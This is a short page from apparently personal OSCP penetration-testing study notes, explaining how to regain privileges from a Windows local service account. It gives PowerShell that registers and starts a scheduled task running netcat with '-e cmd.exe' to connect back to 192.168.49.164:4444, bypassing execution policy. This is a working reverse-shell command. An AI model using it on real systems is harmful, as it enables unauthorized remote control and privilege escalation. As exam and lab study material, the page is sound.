O
O
OSCP Notes
Search
⌃K
Introduction
Port scanning
Passive Information Gathering
Ports enum:
Recon Tools
Tech Skills Needed
msfvenom
meterpreter commands
Web Apps
python scripts
Windows hacks
Port Forwarding
Reverse shells
Binary exploitation
Transfering Modules
Buffer Overflow
Cracking!
shellshock
Active Directory
Antivirus Evasion
Windows Priv Esc
Basic Windows Priv Esc
Accesschk.exe
Enumerating Binaries That AutoElevate
Reverse shell to system
Insecure File Permissions Priv Esc
Post exploitation modules(Windows)
juicy potato
Priv esc guide
Windows XP SP0/SP1 Priv esc
Unquoted path Manual Exploitation
Pass the hash
Create a new account (with Admin access) for RDP
localservice Priv Esc
Printspoofer PE(instantly become System!)
Page 1
Bypassing Default UAC settigs manually
printer SeLoadDriverPrivilege PE
Linux Priv Esc
Active Directory Case Studies
Pivoting
C program analysis
Misc
Hack the box Write-ups
THM Offensive Security Path
Proving Ground
Cyber Sec Labs
Powered By GitBook

localservice Priv Esc

​
When you are in local service account, you can regain permissions by scheduling a task
Give Me Back My Privileges! Please? | itm4n's blog
​
$TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -Command `"C:\wamp\www\nc.exe 192.168.49.164 4444 -e cmd.exe`""
Register-ScheduledTask -Action $TaskAction -TaskName "Grants"
Start-ScheduledTask -TaskName "Grants"
​
Previous
Create a new account (with Admin access) for RDP
Next
Printspoofer PE(instantly become System!)
Last modified 10mo ago
Copy link